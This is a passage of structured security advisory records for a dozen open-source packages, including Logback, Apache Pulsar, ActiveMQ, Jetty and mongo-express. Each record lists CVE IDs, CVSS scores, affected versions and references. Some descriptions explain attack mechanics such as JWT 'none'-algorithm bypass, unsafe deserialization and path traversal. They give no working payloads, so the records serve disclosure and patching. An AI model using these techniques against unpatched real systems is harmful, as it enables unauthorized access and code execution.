Traversal for deleting files.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/dutchcoders/transfer.sh'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33497'}, {'type': 'WEB', 'url': 'https://github.com/dutchcoders/transfer.sh/pull/373'}, {'type': 'WEB', 'url': 'https://github.com/dutchcoders/transfer.sh/releases/tag/v1.2.4'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/44'}]","{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T18:00:48Z', 'nvd_published_at': '2021-05-24T05:15:00Z'}" +1.4.0,GHSA-q4hm-fwc9-hmv6,2022-04-18T21:55:54Z,2021-06-16T17:53:20Z,,['CVE-2021-23331'],Insecure temporary file used in com.squareup:connect,"This affects all versions of package com.squareup:connect. The method prepareDownloadFilecreates creates a temporary file with the permissions bits of -rw-r--r-- on unix-like systems. On unix-like systems, the system temporary directory is shared between users. As such, the contents of the file downloaded by downloadFileFromResponse will be visible to all other users on the local system. A workaround fix for this issue is to set the system property java.io.tmpdir to a safe directory as remediation. Note: This version of the SDK is end of life and no longer maintained, please upgrade to the latest version.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.squareup:connect'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.20191120.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23331'}, {'type': 'PACKAGE', 'url': 'https://github.com/square/connect-java-sdk'}, {'type': 'WEB', 'url': 'https://github.com/square/connect-java-sdk/blob/master/src/main/java/com/squareup/connect/ApiClient.java%23L613'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-COMSQUAREUP-1065988'}]","{'cwe_ids': ['CWE-377'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:46:28Z', 'nvd_published_at': '2021-02-03T18:15:00Z'}" +1.4.0,GHSA-m6cp-vxjx-65j6,2022-02-08T21:21:05Z,2021-06-23T20:23:04Z,,['CVE-2021-34428'],SessionListener can prevent a session from being invalidated breaking logout,"### Impact +If an exception is thrown from the `SessionListener#sessionDestroyed()` method, then the session ID is not invalidated in the session ID manager. On deployments with clustered sessions and multiple contexts this can result in a session not being invalidated. This can result in an application used on a shared computer being left logged in. + +There is no known path for an attacker to induce such an exception to be thrown, thus they must rely on an application to throw such an exception. The OP has also identified that during the call to `sessionDestroyed`, the `getLastAccessedTime()` throws an `IllegalStateException`, which potentially contrary to the servlet spec, so applications calling this method may always throw and fail to log out. If such an application was only tested on a non clustered test environment, then it may be deployed on a clustered environment with multiple contexts and fail to log out. + +### Workarounds +The application should catch all Throwables within their `SessionListener#sessionDestroyed()` implementations. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.4.41'}]}], 'database_specific': {'last_known_affected_version_range': '<= 9.4.40'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.0.2'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.0.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 11.0.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-m6cp-vxjx-65j6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-34428'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse/jetty.project/'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r67c4f90658fde875521c949448c54c98517beecdc7f618f902c620ec@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8a1a332899a1f92c8118b0895b144b27a78e3f25b9d58a34dd5eb084@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbefa055282d52d6b58d29a79fbb0be65ab0a38d25f00bd29eaf5e6fd@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rddbb4f8d5db23265bb63d14ef4b3723b438abc1589f877db11d35450@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ref1c161a1621504e673f9197b49e6efe5a33ce3f0e6d8f1f804fc695@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf36f1114e84a3379b20587063686148e2d5a39abc0b8a66ff2a9087a@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210813-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4949'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-613'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-06-22T16:41:00Z', 'nvd_published_at': '2021-06-22T15:15:00Z'}" +1.4.0,GHSA-m5vx-8chx-qvmm,2021-07-29T14:34:11Z,2021-06-22T15:15:08Z,,['CVE-2021-32697'],Form validation can be skipped,"### Impact +By crafting a special `GET` request containing a valid form state, a form can be submitted without invoking any validators. +We consider the severity _low_ because it is not possible to _change_ any form values since the form state is secured with an HMAC that is still verified. +That means that this issue can only be exploited if Form Finishers cause side effects even if no form values have been sent. + +### Patches +https://github.com/neos/form/commit/69de4219b1f58157e2be6b05811463875d75c246 + +### Workarounds +Form Finishers can be adjusted in a way that they only execute an action if the submitted form contains some expected data. +Alternatively a custom Finisher can be added as first finisher. + +### References +This regression was introduced with https://github.com/neos/form/commit/049d415295be8d4a0478ccba97dba1bb81649567 +Original report: https://tickets.neos.io/#ticket/zoom/411 (internal)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'neos/form'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '4.3.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'neos/form'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.9'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'neos/form'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '5.1.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/neos/form/security/advisories/GHSA-m5vx-8chx-qvmm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32697'}, {'type': 'WEB', 'url': 'https://github.com/neos/form-ghsa-m5vx-8chx-qvmm/pull/1'}, {'type': 'WEB', 'url': 'https://github.com/neos/form/commit/049d415295be8d4a0478ccba97dba1bb81649567'}, {'type': 'WEB', 'url': 'https://github.com/neos/form/commit/69de4219b1f58157e2be6b05811463875d75c246'}, {'type': 'WEB', 'url': 'https://github.com/neos/form/releases/tag/5.1.3'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-21T17:39:52Z', 'nvd_published_at': '2021-06-21T19:15:00Z'}" +1.4.0,GHSA-vmfg-rjjm-rjrj,2022-11-17T20:55:47Z,2021-06-07T16:07:36Z,,['CVE-2017-5929'],QOS.ch Logback vulnerable to Deserialization of Untrusted Data,"QOS.ch Logback before 1.2.0 has a serialization vulnerability affecting the SocketServer and ServerSocketReceiver components. The RemoteStreamAppenderClient class in logback-classic and the SocketNode classes in logback-classic and logback-access allow data to be deserialized over a Java Socket, via an ObjectInputStream, without validating the data beforehand. When data is received from the Socket, to be logged, it is deserialized into Java objects.An attacker can exploit this vulnerability by sending malicious, serialized Java objects over the connection to the Socket, which may result in execution of arbitrary code when those objects are deserialized. Note that although logback-core is implicated by the Logback project here, the Sonatype Security Research team discovered that the vulnerability is actually present in the logback-classic and logback-access components. Versions prior to 1.2.0 are vulnerable, as stated in the advisory.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'ch.qos.logback:logback-classic'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'ch.qos.logback:logback-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-5929'}, {'type': 'WEB', 'url': 'https://github.com/qos-ch/logback/commit/f46044b805bca91efe5fd6afe52257cd02f775f8'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2017:1675'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2017:1676'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2017:1832'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2018:2927'}, {'type': 'WEB', 'url': 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5929'}, {'type': 'PACKAGE', 'url': 'https://github.com/qos-ch/logback'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/18d509024d9aeb07f0e9579066f80bf5d4dcf20467b0c240043890d1@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/a6db61616180d73711d6db25703085940026e2dbc40f153f9d22b203@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/fa4eaaa6ff41ac6f79811e053c152ee89b7c5da8a6ac848ae97df67f@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0bb19330e48d5ad784fa20dacba9e5538d8d60f5cd9142e0f1432b4b@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2a08573ddee4a86dc96d469485a5843a01710ee0dc2078dfca410c79@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2c2d57ca180e8173c90fe313ddf8eabbdcf8e3ae196f8b9f42599790@%3Ccommits.mnemonic.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r397bf63783240fbb5713389d3f889d287ae0c11509006700ac720037@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4673642893562c58cbee60c151ded6c077e8a2d02296e862224a9161@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r632ec30791b441e2eb5a3129532bf1b689bf181d0ef7daf50bcf0fd6@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r718f27bed898008a8e037d9cc848cfc1df4d18abcbaee0cb0c142cfb@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r967953a14e05016bc4bcae9ef3dd92e770181158b4246976ed8295c9@%3Cdev.brooklyn.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra007cec726a3927c918ec94c4316d05d1829c49eae8dc3648adc35e2@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbb4dfca2f7e3e8f3570eec21c79832d33a51dfde6762725660b60169@%3Cdev.mnemonic.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc5f0cc2f3b153bdf15ee7389d78585829abc9c7af4d322ba1085dd3e@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd2227af3c9ada2a72dc72ed05517f5857a34d487580e1f2803922ff9@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re9b787727291786dfe088e3cd078c7d195c0b5781e15d3cd24a3b2fc@%3Cdev.mnemonic.apache.org%3E'}, {'type': 'WEB', 'url': 'https://logback.qos.ch/news.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-04T20:45:34Z', 'nvd_published_at': '2017-03-13T06:59:00Z'}" +1.4.0,GHSA-3cv4-xxv7-934q,2022-06-06T18:16:01Z,2021-06-01T21:53:49Z,,['CVE-2021-22160'],Improper Verification of Cryptographic Signature in Apache Pulsar in TensorFlow,"If Apache Pulsar is configured to authenticate clients using tokens based on JSON Web Tokens (JWT), the signature of the token is not validated if the algorithm of the presented token is set to ""none"". This allows an attacker to connect to Pulsar instances as any user (incl. admins).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.pulsar:pulsar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22160'}, {'type': 'WEB', 'url': 'https://github.com/apache/pulsar/releases/tag/v2.7.2'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r08c7df60cae031361df7fbac39d08b6d5b5079e74db5195d409db9a2@%3Cdev.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r347650d15a3e9c5f58b83e918b6ad6dedc2a63d3eb63da8e6a7be87e%40%3Cusers.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8e545559781231a83bf0644548c660255859e52feb86bbfcd42590da@%3Cdev.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9a12b4da2f26ce9b8f7e7117a879efaa973dab7e54717bbc7923fab1%40%3Cdev.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra49cb62105154e4795b259c79a6b27d63bfa2ab5787ff8529b089550@%3Cdev.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra49cb62105154e4795b259c79a6b27d63bfa2ab5787ff8529b089550@%3Cusers.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbe845aa1573a61769b9c5916c62971f4b10de87c2ea5f38a97f0cf84@%3Cdev.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rca54f4b26ba5e6f2e39732b47ec51640e89f57e3b6a38ac3bab314df@%3Cdev.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re2ae364e0c02093dc721699698c6f23cfbba0220c78b5e28cafeae81@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf2e90942996dceebac8296abf39257cfeb5ae918f82f7af3d37a48c5@%3Cdev.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf54fefc25c49d4715d484133d438f13bf2e515a5fed5d3a745d4f6e7@%3Ccommits.pulsar.apache.org%3E'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T20:20:10Z', 'nvd_published_at': '2021-05-26T13:15:00Z'}" +1.4.0,GHSA-7p8h-86p5-wv3p,2021-06-22T15:44:45Z,2021-06-28T17:18:04Z,,['CVE-2021-21422'],Cross-site scripting,"Two kinds of XSS were found: + +1. As mentioned in https://github.com/mongo-express/mongo-express/issues/577 when the content of a cell grows larger than supported size, clicking on a row will show full document unescaped, however this needs admin interaction on cell. +2. Data cells identified as media will be rendered as media, without being sanitized. Example of different renders: image, audio, video, etc. + + + +### Impact +As an example of type 1 attack, an unauthorized user who only can send a large amount of data in a field of a document may use this payload: +```JSON +{""someField"": ""long string here to surpass the limit of document ...... "" } +``` +This will send an export of a collection to the attacker without even admin knowing. Other types of attacks such as dropping a database\collection are also possible. + +### Patches +Upgrade to `v1.0.0-alpha.4` + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [mongo-express](https://github.com/mongo-express/mongo-express/issues/new) +* Email me at [jafar.akhoondali@gmail.com](mailto:jafar.akhoondali@gmail.com) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'mongo-express'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-alpha.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0-alpha.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/mongo-express/mongo-express/security/advisories/GHSA-7p8h-86p5-wv3p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21422'}, {'type': 'WEB', 'url': 'https://github.com/mongo-express/mongo-express/issues/577'}, {'type': 'WEB', 'url': 'https://github.com/mongo-express/mongo-express/commit/f5e0d4931f856f032f22664b5e5901d5950cfd4b'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-21T17:53:12Z', 'nvd_published_at': '2021-06-21T19:15:00Z'}" +1.4.0,GHSA-fvfc-8pqr-wjpv,2023-05-24T14:43:36Z,2021-06-16T17:29:08Z,,['CVE-2021-21650'],Missing Authorization in Jenkins S3 publisher Plugin,"Jenkins S3 publisher Plugin prior to 0.11.7 and 0.11.5.1 does not perform Run/Artifacts permission checks in various HTTP endpoints and API models. + +This allows attackers with Item/Read permission to obtain information about artifacts uploaded to S3, if the optional Run/Artifacts permission is enabled. + +S3 publisher Plugin 0.11.7 and 0.11.5.1 requires Run/Artifacts permission to obtain information about artifacts if this permission is enabled.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:s3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.11.6'}, {'fixed': '0.11.7'}]}], 'versions': ['0.11.6']}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:s3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.11.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21650'}, {'type': 'WEB', 'url': 'https://github.com/CVEProject/cvelist/blob/2d78eb36f4d084db7fb35f1535d8d84fdcb7d859/2021/21xxx/CVE-2021-21650.json'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2021-05-11/#SECURITY-2200'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T19:02:05Z', 'nvd_published_at': '2021-05-11T15:15:00Z'}" +1.4.0,GHSA-qj26-7grj-whg3,2023-02-09T19:59:34Z,2021-06-23T17:18:49Z,,['CVE-2018-6558'],Privilege Escalation in fscrypt,"The pam_fscrypt module in fscrypt before 0.2.4 may incorrectly restore primary and supplementary group IDs to the values associated with the root user, which allows attackers to gain privileges via a successful login through certain applications that use Linux-PAM (aka pam).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/google/fscrypt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-6558'}, {'type': 'WEB', 'url': 'https://github.com/google/fscrypt/issues/77'}, {'type': 'WEB', 'url': 'https://github.com/google/fscrypt/commit/3022c1603d968c22f147b4a2c49c4637dd1be91b'}, {'type': 'WEB', 'url': 'https://github.com/google/fscrypt/commit/315f9b042237200174a1fb99427f74027e191d66'}, {'type': 'PACKAGE', 'url': 'https://github.com/google/fscrypt'}, {'type': 'WEB', 'url': 'https://launchpad.net/bugs/1787548'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0027'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T21:04:58Z', 'nvd_published_at': None}" +1.4.0,GHSA-9mgm-gcq8-86wq,2021-04-05T22:53:40Z,2021-06-16T17:39:35Z,,['CVE-2021-26117'],Improper Authentication in Apache ActiveMQ and Apache Artemis,"The optional ActiveMQ LDAP login module can be configured to use anonymous access to the LDAP server. In this case, for Apache ActiveMQ Artemis prior to version 2.16.0 and Apache ActiveMQ prior to versions 5.16.1 and 5.15.14, the anonymous context is used to verify a valid users password in error, resulting in no check on the password.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.activemq:activemq-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.16.0'}, {'fixed': '5.16.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.activemq:activemq-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.15.14'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.activemq:apache-artemis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.16.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26117'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/AMQ-8035'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/ARTEMIS-2895'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r110cacfa754471361234965ffe851a046e302ff2693b055f49f47b02@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r22cdc0fb45e223ac92bc2ceff7af92f1193dfc614c8b248534456229@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3341d96d8f956e878fb7b463b08d57ca1d58fec9c970aee929b58e0d@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r519bfafd67091d0b91243efcb1c49b1eea27321355ba5594f679277d@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5899ece90bcae5805ad6142fdb05c58595cff19cb2e98cc58a91f55b@%3Cgitbox.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r70389648227317bdadcdecbd9f238571a6047469d156bd72bb0ca2f7@%3Cgitbox.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r946488fb942fd35c6a6e0359f52504a558ed438574a8f14d36d7dcd7@%3Ccommits.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra255ddfc8b613b80e9fa22ff3e106168b245f38a22316bfb54d21159@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raea451de09baed76950d6a60cc4bb1b74476c505e03205a3c68c9808@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd05b1c9d61dbd220664d559aa0e2b55e5830f006a09e82057f3f7863@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd75600cee29cb248d548edcf6338fe296466d63a69e2ed0afc439ec7@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re1b98da90a5f2e1c2e2d50e31c12e2578d61fe01c0737f9d0bd8de99@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rec93794f8aeddf8a5f1a643d264b4e66b933f06fd72a38f31448f0ac@%3Cgitbox.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rffa5cd05d01c4c9853b17f3004d80ea6eb8856c422a8545c5f79b1a6@%3Ccommits.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/03/msg00005.html'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/activemq-users/202101.mbox/%3cCAH+vQmMeUEiKN4wYX9nLBbqmFZFPXqajNvBKmzb2V8QZANcSTA@mail.gmail.com%3e'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210304-0008/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T22:53:40Z', 'nvd_published_at': '2021-01-27T19:15:00Z'}" +1.4.0,GHSA-89v2-g37m-g3ff,2021-06-01T18:53:10Z,2021-06-01T21:18:53Z,,[],Improper Verification of Cryptographic Signature in aws-encryption-sdk-cli,"### Impact + +This advisory addresses several LOW severity issues with streaming signed messages and restricting processing of certain types of invalid messages. + +This ESDK supports a streaming mode where callers may stream the plaintext of signed messages before the ECDSA signature is validated. In addition to these signatures, the ESDK uses AES-GCM encryption and all plaintext is verified before being released to a caller. There is no impact on the integrity of the ciphertext or decrypted plaintext, however some callers may rely on the the ECDSA signature for non-repudiation. Without validating the ECDSA signature, an actor with trusted KMS permissions to decrypt a message may also be able to encrypt messages. This update introduces a new API for callers who wish to stream only unsigned messages. + +For customers who process ESDK messages from untrusted sources, this update also introduces a new configuration to limit the number of Encrypted Data Keys (EDKs) that the ESDK will attempt to process per message. This configuration provides customers with a way to limit the number of AWS KMS Decrypt API calls that the ESDK will make per message. This setting will reject messages with more EDKs than the configured limit. + +Finally, this update adds early rejection of invalid messages with certain invalid combinations of algorithm suite and header data. + +### Patches + +Fixed in versions 1.9 and 2.2. We recommend that all users upgrade to address these issues. + +Customers leveraging the ESDK’s streaming features have several options to protect signature validation. One is to ensure that client code reads to the end of the stream before using released plaintext. With this release, using the new API for streaming and falling back to the non-streaming decrypt API for signed messages prevents using any plaintext from signed data before the signature is validated. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x + +Users processing ESDK messages from untrusted sources should use the new maximum encrypted data keys parameter. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x + +### Workarounds + +None + +### For more information + +https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/concepts.html#digital-sigs + +https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x +",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'aws-encryption-sdk-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'aws-encryption-sdk-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/aws/aws-encryption-sdk-cli/security/advisories/GHSA-89v2-g37m-g3ff'}]","{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T18:53:10Z', 'nvd_published_at': None}" +1.4.0,GHSA-9h4h-8w5p-f28w,2021-05-20T18:58:40Z,2021-06-29T21:23:15Z,,['CVE-2018-19184'],Denial of Service in geth,cmd/evm/runner.go in Go Ethereum (aka geth) allows attackers to cause a denial of service (SEGV) via crafted bytecode.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 